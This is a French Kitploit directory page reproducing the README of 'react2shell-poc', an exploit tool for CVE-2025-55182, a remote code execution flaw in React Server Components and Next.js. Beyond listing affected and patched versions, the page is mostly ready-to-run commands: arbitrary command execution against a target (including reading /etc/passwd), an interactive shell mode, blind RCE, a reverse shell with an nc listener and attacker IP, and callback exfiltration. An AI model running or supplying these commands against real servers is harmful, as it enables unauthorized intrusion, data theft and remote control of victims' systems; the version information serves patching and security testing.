Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
react2shell-poc — PoC CVE-2025-55182 React2Shell - RCE critique dans les composants serveur React / Next.js. CVSS 10.0. Exfiltration basée sur les erreurs, shell inversé, mode interactif. | Kitploit
Outils/GitHubGitHub/p3ta00/react2shell-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à Distance
GitHubp3ta00/react2shell-poc

react2shell-poc

PoC CVE-2025-55182 React2Shell - RCE critique dans les composants serveur React / Next.js. CVSS 10.0. Exfiltration basée sur les erreurs, shell inversé, mode interactif.

912il y a 3 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

React2Shell - PoC de CVE-2025-55182

Preuve de concept pour CVE-2025-55182, une vulnérabilité critique non authentifiée d'exécution de code à distance dans les composants serveur React.

Score CVSS : 10,0 (Critique)

Vulnérabilité

La vulnérabilité réside dans le désérialiseur du protocole Flight de React. En exploitant la pollution de prototype via des charges utiles spécialement conçues, un attaquant peut exécuter du code arbitraire sur les applications Next.js vulnérables.

Versions affectées

ProduitVulnérableCorrigé
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

Installation

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

Utilisation

Exécution de commande avec sortie (par défaut - Exfiltration par erreur)

La sortie est renvoyée directement dans la réponse HTTP via l'erreur NEXT_REDIRECT - aucun serveur de callback nécessaire.

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

Mode interactif

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

Vérifier la vulnérabilité

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

RCE aveugle (sans sortie)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

Reverse Shell

root@kitploit:~
# Start listener
nc -lvnp 4444

# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

Ancien : Exfiltration basée sur callback

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

Options

root@kitploit:~
-t, --target       URL cible (obligatoire)
-c, --command      Commande à exécuter (sortie via exfiltration par erreur par défaut)
--check            Vérifier si la cible est vulnérable
--blind            Mode RCE aveugle (aucune capture de sortie)
--listen           Utiliser un serveur de callback au lieu de l'exfiltration par erreur
-i, --interactive  Mode pseudo-shell interactif
--revshell         Tenter un reverse shell
--lhost            IP de l'attaquant pour les callbacks/reverse shell
--lport            Port de callback (par défaut : 9999)
--callback         URL de callback manuelle
--timeout          Délai d'attente de la requête en secondes (par défaut : 30)

Comment ça fonctionne

La méthode d'exfiltration par défaut utilise l'injection d'erreur NEXT_REDIRECT :

  1. Exécuter la commande et capturer la sortie
  2. Lancer une erreur NEXT_REDIRECT avec la sortie dans le champ digest
  3. Next.js sérialise l'erreur dans la réponse Flight
  4. La sortie apparaît directement dans le corps de la réponse HTTP

C'est plus fiable que l'exfiltration basée sur callback car cela ne nécessite pas d'accès réseau sortant depuis la cible.

Références

  • Wiz Security - Divulgation React2Shell
  • Analyse de Datadog Security Labs
  • NVD - CVE-2025-55182

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé aux systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.

Auteur

p3ta

Télécharger l’outil